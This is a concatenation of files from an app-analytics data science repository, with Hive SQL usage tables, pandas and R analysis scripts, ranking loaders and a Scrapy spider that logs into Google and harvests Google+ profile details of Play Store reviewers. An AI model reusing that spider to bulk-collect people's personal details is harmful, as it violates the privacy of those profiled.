lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_ios'
;
insert overwrite table mdm_usage_ios
select
/*+ STREAMTABLE(devices) */
devices.period_date as date,
devices.guid_key,
max(devices.guid) as guid,
m.bundle_id,
max(devices.device_platform) as device_platform,
max(devices.iso_country_code) as iso_country_code,
max(devices.device_type) as device_type
from devices_ios
join mdm_sample_app_days_running m
on m.date between '2015-05-20' and '2015-06-30'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices.guid_key = m.guid_key
group by
devices.period_date,
devices.guid_key,
m.bundle_id
;
-- Android
drop table if exists devices_android;
create table devices_android
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-06-01' and '2015-06-30'
and d.device_type != 'unknown'
and g.device_platform = 'android'
;
drop table if exists mdm_usage_android;
create table mdm_usage_android (
date date,
guid_key int,
guid string,
bundle_id string,
device_platform string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/mdm/usage_android'
;
insert overwrite table mdm_usage_android
select
/*+ STREAMTABLE(devices) */
devices.period_date as date,
devices.guid_key,
max(devices.guid) as guid,
m.bundle_id,
max(devices.device_platform) as device_platform,
max(devices.iso_country_code) as iso_country_code,
max(devices.device_type) as device_type
from (
devices_android
join mdm_sample_app_screen_time m
on m.date between '2015-05-20' and '2015-06-30'
and m.bundle_id not rlike '^(com.mobidia.My-Data-Mgr|com.mobidia.android.mdm|com.vpndefender|com.smartsense.vpndefender).*'
-- Join daily usage with proper end date by adding the number of
-- days to the next Saturday to the daily date
-- As the Saturday is the 6th day, shift all days with 1 day to
-- easily compute the distance
and devices.period_date = date_add(m.date,
cast(7 -
from_unixtime(unix_timestamp(date_add(m.date, 1), 'yy-MM-dd'), 'u')
as int
)
)
and devices.guid_key = m.guid_key
group by
devices.period_date,
devices.guid_key,
m.bundle_id
;
drop table if exists devices_android;<file_sep>/exact-matching-improvement/icon_lib/config.py
DISTIMO_DB_PARAMETERS = {
'host': 'mm3',
'port': 3306,
'user': 'henk',
'passwd': '<PASSWORD>'}
APPANNIE_DB_PARAMETERS = {
'host': 'ds-rds-2.crlexxwtzodp.us-east-1.rds.amazonaws.com',
'user': '',
'password': ''
}
DISTIMO_MATCHED_APPLICATIONS_TABLE = 'app_matching_dev.matched_applications_icons'
DISTIMO_MATCHES_TABLE = 'app_matching_dev.icon_matches'
ICON_DIR = 'icons/'
N_PARALLEL_SCRAPING = 4
DEFAULT_HASH_TYPE = 'dhash'
DEFAULT_HASH_SIZE = 12
DEFAULT_HASHING_POOL_SIZE = 4
<file_sep>/aa_au_model/hiveql_scripts/get_countries_per_device.sql
-- get the countries per device from app session data
-- change date range and folder to output data to on ds environment
DROP TABLE country_devices;
CREATE TABLE country_devices
AS
SELECT datestr, device_id, country
FROM vpn_sample_data_session
WHERE datestr >= '2015-01-10'
AND datestr <= '2015-01-31'
GROUP BY datestr, device_id, country
;
DROP TABLE csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`country` string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
;
INSERT OVERWRITE TABLE csvexport
SELECT * FROM country_devices
;<file_sep>/evaluation/py/aggregate_daily.py
import sys
import os
import os.path
import pandas as pd
import numpy as np
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = _aggregate_daily(pd.read_csv(full_path))
df.to_csv(os.path.join(output_dir, f), index=False)
def _aggregate_daily(df):
potential_drops = ['date', 'rank']
potential_groups = ['app_id', 'feed_id', 'category_id']
potential_aggregate_strategies = {
'estimate': np.nansum, 'units': np.nansum
}
aggregate_strategies = {i: potential_aggregate_strategies[i]
for i in potential_aggregate_strategies.iterkeys()
if i in df.columns}
drops = [c for c in df.columns if c in potential_drops]
groups = [c for c in df.columns if c in potential_groups]
grouped = df.drop(drops, axis=1).groupby(groups)
agg = grouped.aggregate(aggregate_strategies)
return agg.reset_index()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/mdm/mdm/data.py
import glob
import pandas as pd
DIM_GUID_FOLDER = '/s3mnt-projecta/aardvark-prod-pdx-mdm-interface/dimension/MDM_DIM_GUID/'
DIM_GUID_COLS = [
'guid_key', 'guid', 'device_platform', 'latest_imei', 'latest_legacy_hash', 'latest_phone_hash',
'latest_imsi_hash', 'initial_product_key', 'latest_product_key', 'latest_device_key',
'latest_sim_operator_key', 'latest_serving_operator_key', 'latest_data_transfer_at',
'latest_checkin_at', 'latest_os_version_key', 'created_at', 'updated_at'
]
GUID_HASH_FOLDER = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/MDM_GUID_HASH/'
GUID_HASH_COLS = [
'guid', 'guid_hash', 'platform',
]
def load_dim_guid():
"""
Load all data from DIM_GUID table.
:return: pd.DataFrame with DIM GUID info
"""
paths = glob.glob(DIM_GUID_FOLDER + 'data*')
dim_guid = pd.concat((pd.read_table(p, names=DIM_GUID_COLS) for p in paths),
axis=0, ignore_index=True)
return dim_guid
def load_guid_hash():
"""
Load all data from GUID HASH table.
:return: pd.DataFrame with GUID HASH info
"""
paths = glob.glob(GUID_HASH_FOLDER + 'part*')
guid_hash = pd.concat((pd.read_table(p, names=GUID_HASH_COLS) for p in paths),
axis=0, ignore_index=True)
return guid_hash
def load_country_usage_redshift(iso_code, time_frame='weekly', data_folder='data/'):
"""
Load MDM usage for a country.
:param iso_code: Two letter iso code
:param time_frame: 'weekly' or 'monthly'
:param data_folder: Path to folder to load data from
:return DataFrame with MDM usage
"""
def load_df(p):
d = pd.read_csv(p)
# Rename columns to align with VPN
d.rename(columns={'package': 'bundle_id', 'guid_key': 'device_id',
'device_type_snapshot': 'device_type'},
inplace=True)
d['bundle_id'] = d.bundle_id.str.rstrip('/')
return d
expression = (data_folder + '_'.join(('mdm_usage', time_frame, iso_code))
+ '*.csv')
paths = glob.glob(expression)
df = pd.concat((load_df(p) for p in paths), axis=0)
date_str_formatter = lambda x: '{}-{}-{}'.format(x[:4], x[4:6], x[6:])
is_valid_device = df.device_type.isin(['tablet', 'smartphone'])
df = df[is_valid_device]
df['date'] = df.date.astype(str).apply(date_str_formatter)
df['platform'] = df.platform.astype('category')
df['device_type'] = df.device_type.astype('category')
df.sort(['date', 'device_id', 'bundle_id'], inplace=True)
return df<file_sep>/old_investigations/android/plot_80_20.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
sub_df= subset(sub_df, estimate_overall>0)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
estimation <- c("estimate_games", "estimate_avg", "estimate_dailybest", "estimate_dailyworst")
size <- c(1, 1, 0.5, 0.5)
differences = seq(0.01, 1, by=.025)
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
## Iterate the estimations
for (i in 1:length(estimation)) {
current_esti= estimation[i]
rel_errors = abs(current_df[[current_esti]] - current_df[['units_avg']]) / current_df[['units_avg']]
apps_percent = sapply(differences, function(x) sum(rel_errors <= x, na.rm=TRUE) / length(rel_errors))
apps_num = dim(current_df)[1]
print(apps_num)
new_df = data.frame(apps_percent, differences, estimation=current_esti, size=size[i], unit=unit, apps_num)
stacked_df = rbind(stacked_df, new_df)
}
}
plot <- plot_80_20(stacked_df, metainfo)
ggsave(plot, file=paste('plots/',
paste(metainfo$country, metainfo$period, 'plots.png', sep='_'), sep=''),
width=8, height=5)
<file_sep>/exact-matching-improvement/lib/plotting.py
__author__ = 'jjanssen, srhmtonk'
import matplotlib.pyplot as plt
import sklearn.metrics as me
import pandas as pd
import numpy as np
def generate_precision_vs_recall_plot(df, label, metric, metric_y_label):
precision, recall, thresholds = me.precision_recall_curve(df[label], df[metric])
fig = plt.figure()
plt.plot(thresholds, precision[:-1], label="precision")
plt.plot(thresholds, recall[:-1], label="recall")
plt.xlabel(metric_y_label)
plt.legend(loc="lower right")
return fig
def generate_roc_plot(df, label, metric, metric_title_name, xlim_low = 0.0, xlim_high = 1.0):
fpr, tpr, roc_threshold = me.roc_curve(df[label], df[metric])
auc = round(me.auc(fpr, tpr), 4)
fig = plt.figure()
plt.title("ROC plot for " + metric_title_name + ", AUC: " + str(auc))
plt.plot(fpr, tpr)
plt.xlabel('False positive ratio')
plt.ylabel('True positive ratio')
plt.xlim([xlim_low, xlim_high])
return fig, roc_threshold
def generate_hist_plot(df, metric, metric_title_name):
# split matches in matches and non matches
matches_levenshtein_ratio = df[df.is_a_match == 1][metric]
non_matches_levenshtein_ratio = df[df.is_a_match == 0][metric]
# determine how to weigh entries to get properly normalized histograms
matches_weights = np.ones_like(matches_levenshtein_ratio)/len(matches_levenshtein_ratio)
non_matches_weights = np.ones_like(non_matches_levenshtein_ratio)/len(non_matches_levenshtein_ratio)
# do plotting
fig = plt.figure()
plt.hist([matches_levenshtein_ratio, non_matches_levenshtein_ratio],
label=['matches', 'non matches'], alpha=0.6, weights=[matches_weights, non_matches_weights])
plt.xlabel(metric_title_name)
plt.ylabel('Probability')
plt.title("Normalized histogram plot for " + metric_title_name)
plt.legend(loc="upper right")
plt.close(fig)
return fig
<file_sep>/ranking_change/correlations.py
#!/usr/bin/env python
import scipy.stats
import itertools
import config
import sys
import time
import csv
import datetime
import pandas as pd
import matplotlib.pyplot as plt
import math
import psycopg2
import numpy as np
import matplotlib.cm as cm
import matplotlib.dates as mdates
from itertools import cycle
import datetime as dt
import os.path
GREE_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/csv_ranks/unziped' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(GREE_RANKING_FILES_PATH):
print 'Expecting gree ranking files in directory %s' % GREE_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection():
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=aa_staging_small user=aa host=nile')
return CONN
def read_sales(date, store_id, value_type, table_name):
conn = get_connection()
cur = conn.cursor()
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
cur.execute(sql, params)
print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'App ID': app_id, 'Value': value}
cur.close()
def add_f_date(df):
df2 = df[['Date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['Date']]
df = df.merge(df2, on='Date')
return df
def try_mkdir(path):
try:
os.mkdir(path)
except OSError, e:
if e.errno != 17:
raise
def plot_multi_category_correlation(df):
try_mkdir('plots')
gdf = df.groupby(['Country_Name', 'Market', 'Value_Type', 'Rank_Type'])
for n,g in gdf:
plt.clf()
fig = plt.figure(figsize=(36,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
max_rank_shift = 0
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['Correlation'], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
plt.gcf().autofmt_xdate()
ax.grid()
ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
plt.savefig('plots/correlation_%s.png'%('_'.join(n)))
#plt.show()
def plot_correlation(df):
try_mkdir('plots')
gdf = df.groupby(['Country_Name', 'Market', 'Category', 'Value_Type', 'Rank_Type'])
for n,g in gdf:
plt.clf()
#fig = plt.figure()
#fig = plt.figure(figsize=(36,12))
fig = plt.figure(figsize=(int(len(g['Date'].drop_duplicates())/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['f_date'].values, g['Correlation'], linewidth=3)
plt.gcf().autofmt_xdate()
ax.grid()
plt.ylim(-1.0, -0.4)
plt.title(str(n))
plt.savefig('plots/correlation_%s.png'%('_'.join(n)))
#plt.show()
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
def read_ranks(date, ranking_store_str_filter, category_id_str_filter):
fn = '/Users/perezrafael/appannie/data/ranks/special/ranking_%s.sql' % date.strftime('%Y-%m-%d')
#fn = '/Users/riwatt/Work/new_ranks/ranking_%s.sql' % date.strftime('%Y-%m-%d')
print 'reading ranks from', fn
empty_rankings = 0
for line in open(fn):
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
assert ranking_date_str == date.strftime('%Y-%m-%d')
if ranking_store_str not in ranking_store_str_filter:
continue
if ranking_category_str not in category_id_str_filter:
continue
if ranking_list_str_unsplit == '\n':
empty_rankings += 1
continue
ranking_list_str_split = ranking_list_str_unsplit[:-1].split(' ')
for rank, app_id_str in enumerate(ranking_list_str_split, 1):
yield ranking_store_str, ranking_category_str, ranking_feed_str, rank, int(app_id_str)
print empty_rankings, 'empty rankings'
#@profile
def main():
FILTER_CATEGORY_IDS = (
'36',
'6014',
'7006',
'6005',
'6007',
'6016',
)
FILTER_CATEGORY_IDS = (
'36',
'6000',
'6001',
'6002',
'6003',
'6004',
'6005',
'6006',
'6007',
'6008',
'6009',
'6010',
'6011',
'6012',
'6013',
'6014',
'6015',
'6016',
'6017',
'6018',
'6020',
'6021',
'6023',
'7001',
'7002',
'7003',
'7004',
'7005',
'7006',
'7007',
'7008',
'7009',
'7010',
'7011',
'7012',
'7013',
'7014',
'7015',
'7016',
'7017',
'7018',
'7019'
)
FILTER_FEED_IDS = (
'0',
'1',
'2',
'100',
'101',
'102',
)
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
FILTER_STORE_IDS = (
# P1
'143441',
'143444',
'143465',
'143462',
'143455',
# P2
'143460',
'143443',
'143442',
'143469',
'143450',
)
DATES = make_date_range(datetime.date(2013, 7, 2), datetime.date(2013, 8, 12))
assert len(DATES) > 1, 'plotter needs at least 1 day to determine the size of the figure'
try_mkdir('data')
total_loops = len(DATES) * len(FILTER_CATEGORY_IDS) * len(FILTER_FEED_IDS) * (FILTER_ACTUALS) * len(FILTER_STORE_IDS)
loop_count = 0
none_count = 0
writer = csv.writer(open('corr-results-%s.csv' % time.time(), 'w'))
writer.writerow(['date', 'store_id', 'value_type', 'category_id', 'feed_id', 'rank_limit', 'actuals_count', 'rank_transform_name', 'value_transform_name', 'corr', 'pval'])
for date in DATES:
rankfile_df = pd.DataFrame(list(read_ranks(date, FILTER_STORE_IDS, FILTER_CATEGORY_IDS)),
columns=['store_id_str', 'category_id_str', 'feed_id_str', 'Rank', 'App ID'])
for store_id_str in FILTER_STORE_IDS:
for (table_name, value_type) in FILTER_ACTUALS:
ranks_in_store_df = rankfile_df[rankfile_df['store_id_str'] == store_id_str]
sales_df = pd.DataFrame(list(read_sales(date, int(store_id_str), value_type, table_name)))
if not len(sales_df):
print 'no actuals for', date, store_id_str, value_type
continue
assert len(ranks_in_store_df)
merged_df = pd.merge(ranks_in_store_df, sales_df, on='App ID')
assert list(set(merged_df['store_id_str'])) == [store_id_str]
del merged_df['store_id_str']
del merged_df['App ID']
for (category_id_str, feed_id_str), group in merged_df.groupby(['category_id_str', 'feed_id_str']):
for rank_limit in (300, 1000, 1500):
for (rank_transform, value_transform) in itertools.product([float, math.log], repeat=2):
df = group[group['Rank'] <= rank_limit]
actuals_count = len(df)
if actuals_count == 0:
continue
corr, pval = scipy.stats.pearsonr(df['Rank'].apply(rank_transform),
df['Value'].apply(value_transform))
row = [date, store_id_str, value_type, category_id_str, feed_id_str, rank_limit, actuals_count, rank_transform.__name__, value_transform.__name__, corr, pval]
writer.writerow(row)
if __name__ == '__main__':
main()
<file_sep>/audience/google-plus-scraping/lib/scraper/scraper/spiders/googleplus.py
# -*- coding: utf-8 -*-
import pandas as pd
import re
import scrapy
from ..items import ScraperItem
from ..constants import DIV_PATHS, SCRAPE_ACCOUNT
from scrapy import FormRequest, Request, log
from scrapy.shell import inspect_response
class GoogleplusSpider(scrapy.Spider):
"""
Spider for scraping Google+ profiles. Loads IDs from the column id in the file play_reviewers.csv.
"""
name = "googleplus"
allowed_domains = ["google.com"]
reviewers = pd.read_csv('play_reviewers.csv', index_col=False)
start_urls = ['https://accounts.google.com/']
base_url = 'https://plus.google.com/'
profile_urls = None
n_yielded = 0
batch_size = 15000
handle_httpstatus_list = [404]
def parse(self, response):
"""
Login to Google+.
:param response: Response object
:return: Request object
"""
return [FormRequest.from_response(
response,
formdata=SCRAPE_ACCOUNT,
callback=self.start_post_login_process)
]
def start_post_login_process(self, response):
"""
Start login process: fail if unsuccessful, begin scraping otherwise.
:param response: Response object
:return: Request object to scrape
"""
if response.url in ('https://www.google.com/settings/personalinfo', 'https://myaccount.google.com/?pli=1'):
self.log("Login successful", level=log.INFO)
else:
self.log("Login failed", level=log.ERROR)
self.profile_urls = self._generate_profile_urls()
yield self._get_new_profile_url_request()
def _generate_profile_urls(self):
"""
Generate profile URLs from reviewer IDs.
:return: List with profile URLs to scrape
"""
profile_urls = [self.base_url + str(reviewer_id) + '/about' for reviewer_id in self.reviewers.id]
return profile_urls
def _get_new_profile_url_request(self):
"""
Get a new Request.
:return: Request object
"""
new_profile_url = self.profile_urls[self.n_yielded]
self.n_yielded += 1
return Request(url=new_profile_url, callback=self.parse_profile_page)
def parse_profile_page(self, response):
"""
Parse the profile page.
:param response: Response object
:return: Scrapy item
"""
crawl_stats = self.crawler.stats.get_stats()
n_parsed = crawl_stats.get('item_scraped_count', 0)
self.log('# yielded: %s' % self.n_yielded)
self.log('# parsed: %s' % n_parsed)
if self.n_yielded < len(self.profile_urls) and self.n_yielded - n_parsed < self.batch_size:
for ii in range(self.batch_size):
if self.n_yielded < len(self.profile_urls):
yield self._get_new_profile_url_request()
self.log('NEW YIELDS')
self.log('# yielded: %s' % self.n_yielded)
self.log('# parsed: %s' % n_parsed)
if response.status == '404':
return
item = ScraperItem()
item[u'account_id'] = self._get_account_id(response)
item[u'account_name'] = self._get_account_name(response)
if response.xpath(DIV_PATHS['basic_information']).extract() > 0:
item = self._parse_basic_information(response, item)
if response.xpath(DIV_PATHS['apps_signin']).extract() > 0:
item[u'apps_with_signin'] = self._parse_signin_apps(response)
if response.xpath(DIV_PATHS['in_circles']).extract() > 0:
item[u'in_circles'] = self._parse_in_circles(response)
if response.xpath(DIV_PATHS['education']).extract() > 0:
item[u'school_names'] = self._parse_education(response)
if response.xpath(DIV_PATHS['work']).extract() > 0:
item[u'occupation'] = self._parse_work(response)
if response.xpath(DIV_PATHS['places']).extract() > 0:
item[u'place'] = self._parse_places(response)
yield item
def _get_account_id(self, response):
"""
Get the account ID from the response url.
:param response: Response object
:return: String with account ID
"""
try:
account_id = re.search(r"plus.google.com/([0-9]*)", response.url).groups()[0]
except AttributeError:
account_id = u""
return account_id
def _get_account_name(self, response):
"""
Get the account name.
:param response: Response object
:return: String with account name
"""
temp = response.xpath(DIV_PATHS['account_name']).extract()
account_name = temp[0] if len(temp) == 1 else ''
return account_name
def _parse_basic_information(self, response, item):
"""
Parse Basic Information DIV_PATHS and return all properties.
:param response: Response object
:param item: Scrapy item
:return: Adjusted Scrapy item with basic information
"""
keys = response.xpath(DIV_PATHS['basic_information'] + DIV_PATHS['basic_information_keys']).extract()
keys = [key.lower().replace(' ', '_') for key in keys]
values = response.xpath(DIV_PATHS['basic_information'] + DIV_PATHS['basic_information_values']).extract()
for key, value in zip(keys, values):
item[key] = self._remove_default_information(key, value)
return item
def _remove_default_information(self, key, value):
"""
Remove default information from the Basic Information DIV_PATHS. Not really needed.
:param key: Key of Scrapy item
:param value: Value of Scrapy item
:return: String with default information removed if present
"""
DEFAULTS = {u'gender': u'',
u'looking_for': u'Who are you looking for?',
u'other_names': u'For example: maiden name, alternate spellings',
u'relationship': u'Seeing anyone?'
}
is_default_information = (key in DEFAULTS) and (DEFAULTS[key] == value)
return u'' if is_default_information else value
def _parse_signin_apps(self, response):
"""
Parse Apps with Google+ Sign-in DIV_PATHS and return names of apps.
:param response: Response object
:return: List with names of apps
"""
values = response.xpath(DIV_PATHS['apps_signin'] + DIV_PATHS['apps_signin_values']).extract()
if len(values) == 0:
values = ''
return values
def _parse_in_circles(self, response):
"""
Parse People DIV_PATHS and return G+ IDs of people having the profile in circle.
:param response: Response object
:return: List with G+ IDs
"""
values = response.xpath(DIV_PATHS['in_circles'] + DIV_PATHS['in_circles_values']).extract()
values = [profile_id[2:] for profile_id in values]
return values
def _parse_education(self, response):
"""
Parse the Education DIV_PATHS and return all schools.
:param response: Response object
:return: List with name of schools
"""
values = response.xpath(DIV_PATHS['education'] + DIV_PATHS['school_names']).extract()
return values
def _parse_work(self, response):
"""
Parse the Work DIV_PATHS and return the occupation.
:param response: Response object
:return: String with occupation
"""
occupation = ""
for current_div in response.xpath(DIV_PATHS['work']):
key = current_div.xpath(DIV_PATHS['work'] + "/div[contains(@class, 'Cr')]/text()").extract()
if len(key) > 0 and key[0] == u"Occupation":
temp = current_div.xpath(DIV_PATHS['work'] + "/div[contains(@class, 'y4')]/text()").extract()
occupation = temp[0] if len(temp) == 1 else temp
return occupation
def _parse_places(self, response):
"""
Parse the Places DIV_PATHS and return current place.
:param response: Response object
:return: String with current place
"""
place = ""
for current_div in response.xpath(DIV_PATHS['places']):
key = current_div.xpath(DIV_PATHS['places'] + "/div[contains(@class, 'Cr')]/text()").extract()
if len(key) > 0 and key[0] == u"Currently":
temp = current_div.xpath(DIV_PATHS['places'] + "/div[contains(@class, 'adr y4')]/text()").extract()
place = temp[0] if len(temp) == 1 else temp
return place
<file_sep>/tooling/merge_sql_files.py
#!/usr/bin/env python
__author__ = 'srhmtonk'
import glob
import re
from natsort import natsort
import time
import argparse
import datetime
def merge_sql_files(path_pattern, name=None):
"""
Merges SQL files given by glob pattern.
"""
files = glob.glob(path_pattern)
# natural order sorting
files = natsort(files)
if len(files) == 0:
print("Sorry, no files found!")
return None
if name is None:
stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%dT%H%M%S')
f = open('merged%s.out'%stamp, 'w')
else:
f = open(name,'w')
for current_file in files:
sql_file = open(current_file, 'r')
sql_text = sql_file.read()
# Remove single line comments and non greedy filter out block
# comments.
line_comment_filter = re.compile("--.*")
block_comment_filter = re.compile("\/\*.*?\*\/", re.DOTALL)
sql_text = block_comment_filter.sub('', sql_text)
sql_text = line_comment_filter.sub('', sql_text)
search_set_delim = re.search('(delimiter\s*)(\S+)\s*', sql_text,
re.IGNORECASE)
if search_set_delim:
new_delim = re.escape(search_set_delim.group(2))
set_delim = search_set_delim.group(1) + new_delim + ".*"
set_delimiter_filter = re.compile(set_delim, re.IGNORECASE)
sql_text = set_delimiter_filter.sub('', sql_text)
new_delim_filter = re.compile(new_delim)
sql_text = new_delim_filter.sub(';', sql_text)
default_delim_filter = re.compile("delimiter\s*;\s*")
sql_text = default_delim_filter.sub('', sql_text)
# Two step filtering out empty sql statements
sql_text = re.sub('(;\\s*;)', ';', sql_text)
sql_text = re.sub('(;\\s*;)', ';', sql_text)
f.write('\n/*\nfile: %s\n*/\n'%current_file)
f.write(sql_text)
f.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='merge_sql_files',
description="Merges the contents of sql files with into a single file.")
parser.add_argument('--pattern', help='Path pattern used for matching files, default "./*.sql"')
parser.add_argument('--name', help='Name of output file, default "merged19000101T000000.out"')
args = parser.parse_args()
merge_sql_files("./*.sql" if args.pattern is None else args.pattern, name=args.name)<file_sep>/rankings/rankings/__init__.py
__author__ = 'hgriffioen'
import db
import os
import pandas as pd
ANDROID_RANKING_PATH = '/s3mnt/ranks_android/Android-Ranking-{date}.csv.bz2'
IOS_RANKING_PATH = '/s3mnt/ranks_ios/ranking_{date}.sql.bz2'
def load_pgpass_credentials():
path = os.path.join(os.path.os.path.expanduser('~'),
'.pgpass')
username = password = None
if os.path.exists(path):
with open(path, 'r') as f:
pgpass = f.readlines()[0].strip().split(':')
username, password = pgpass[-2:]
return username, password
class Platform(object):
def query(self, q):
raise NotImplementedError("Subclass should implement method query()")
class Android(object):
def __init__(self, username=None, password=<PASSWORD>,
hostname='ds-db-1.appannie.org'):
super(Android, self).__init__()
if not username or not password:
username, password = load_pgpass_credentials()
self.android_db = db.DB(
username=username,
password=<PASSWORD>,
hostname=hostname,
dbname='aa_android',
dbtype='postgres'
)
@property
def store_ids(self):
return self.android_db.query("""
select
id as store_id,
code as iso_code
from
store
""")
@property
def category_ids(self):
return self.android_db.query("""
select
id as category_id,
name as category
from
category
""")
@property
def bundle_ids(self):
return self.android_db.query("""
select
id as app_id,
class as bundle_id
from
app
""")
@property
def feeds(self):
return pd.DataFrame({
'feed_id': [0, 1, 2, 3, 4],
'feed': [
'free', 'paid',
'grossing', 'grossing_iap',
'grossing_non_iap'
]})
def query(self, q):
return self.android_db.query(q)
def rankings_daily(self, date):
df = self._load_compressed_rankings(ANDROID_RANKING_PATH.format(date=date))
return self._parse_rankings(df)
def _load_compressed_rankings(self, path):
df = pd.read_csv(path, names=['date', 'iso_code', 'category', 'feed_id', 'ranks'],
compression='bz2')
return df
def _parse_rankings(self, df):
id_cols = ['date', 'iso_code', 'category', 'feed_id']
long_df = (df
.set_index(id_cols)
['ranks'].str.split(" ")
.apply(pd.Series)
.stack())
rankings = pd.DataFrame(long_df.str.split('-').values.tolist(),
columns=['rank', 'bundle_id'],
index=long_df.index)
rankings.reset_index(level=range(0, len(id_cols)), inplace=True)
return rankings
class iOS(object):
def __init__(self, username=None, password=<PASSWORD>,
hostname='ds-db-1.appannie.org'):
super(iOS, self).__init__()
if not username or not password:
username, password = load_pgpass_credentials()
self.ios_db = db.DB(
username=username,
password=<PASSWORD>,
hostname=hostname,
dbname='aa',
dbtype='postgres'
)
@property
def store_ids(self):
return self.ios_db.query("""
select
id as store_id,
country_code as iso_code
from
webanalytics_store
""")
@property
def category_ids(self):
return self.ios_db.query("""
select
id as category_id,
name as category
from
webanalytics_category
""")
@property
def bundle_ids(self):
return self.ios_db.query("""
select
id as app_id,
bundle_id
from
aa_app
""")
@property
def feeds(self):
return pd.DataFrame({
'feed_id': [0, 1, 2, 100, 101, 102],
'feed': [
"IPHONE_FREE", "IPHONE_PAID",
"IPHONE_GROSSING", "IPAD_PAID",
"IPAD_FREE", "IPAD_GROSSING",
]})
def query(self, q):
return self.ios_db.query(q)
def rankings_daily(self, date):
df = self._load_compressed_rankings(IOS_RANKING_PATH.format(date=date))
return self._parse_rankings(df)
def _load_compressed_rankings(self, path):
df = pd.read_table(path,
names=['date', 'store_id', 'category_id', 'feed_id', 'ranks'],
index_col=False,
compression='bz2')
return df
def _parse_rankings(self, df):
id_cols = ['date', 'store_id', 'category_id', 'feed_id']
long_df = (df
.set_index(id_cols)
['ranks'].str.split(" ")
.apply(pd.Series)
.stack())
rankings = (long_df
.reset_index()
.rename(columns={'level_4': 'rank', 0: 'app_id'}))
return rankings<file_sep>/aa_au_model/r_scripts/user_def.R
##########################
### ###
### USER-DEF FUNCTIONS ###
### ###
##########################
#################
# load pacakges #
#################
library(stringr)
library(RCurl)
library(calibrate)
library(RJSONIO)
library(plyr)
library(httr)
library(maps)
library(forecast)
library(fpc)
library(ROCR)
library(cluster)
##############################
# generate sequence of dates #
##############################
readDate = function(dateStart,dateEnd){
# remove all dashes
date_start = gsub("-","",dateStart)
date_end = gsub("-","",dateEnd)
# prepare as data type
date_start = paste(substr(date_start,1,4),"-",substr(date_start,5,6),"-",substr(date_start,7,8),sep="")
date_end = paste(substr(date_end,1,4),"-",substr(date_end,5,6),"-",substr(date_end,7,8),sep="")
date_reg = seq(as.Date(date_start),as.Date(date_end),by="1 day")
date_reg = as.character(date_reg)
return(date_reg)
}
##########################
# process file with data #
##########################
readFile = function(filename){
# check file size
size_file = file.info(filename)$size
# detect if file is gz or simple text
detect_gz = str_detect(filename,".gz")
# read table
if(detect_gz){
if(size_file > 20){
day = read.delim(gzfile(filename),sep="\t",stringsAsFactors=F,check.names=F,header=F)
} else {
return(NULL)
}
} else {
if(size_file > 0){
day = read.delim(filename,sep="\t",stringsAsFactors=F,check.names=F,header=F)
} else {
return(NULL)
}
}
# return matrix
return(day)
}
#############################
# process folder with files #
#############################
readFolder = function(folder_name, date_range){
# initialize empty
